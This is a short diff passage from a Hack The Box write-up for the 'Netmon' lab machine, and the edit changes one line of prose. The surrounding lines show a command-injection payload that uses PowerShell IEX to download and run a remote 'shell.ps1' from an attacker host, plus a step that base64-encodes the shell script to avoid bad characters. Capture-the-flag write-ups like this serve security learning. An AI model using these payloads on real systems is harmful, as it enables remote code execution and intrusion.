Kyuu-Ji/htb-write-up/netmon/write-up-netmon.md

 test | IEX(New-Object Net.WebClient).downloadString("http://10.10.13.112:8000/shell.ps1")
 ```

 Unfortunaly this does not give us a shell.
-So we will eliminate bad characters by Base64 encoding the shell:
+So we will eliminate bad characters by Base64 encoding the shell script:
 ```markdown
 cat shell.ps1 | iconv -t UTF-16LE | base64 -w0
 ```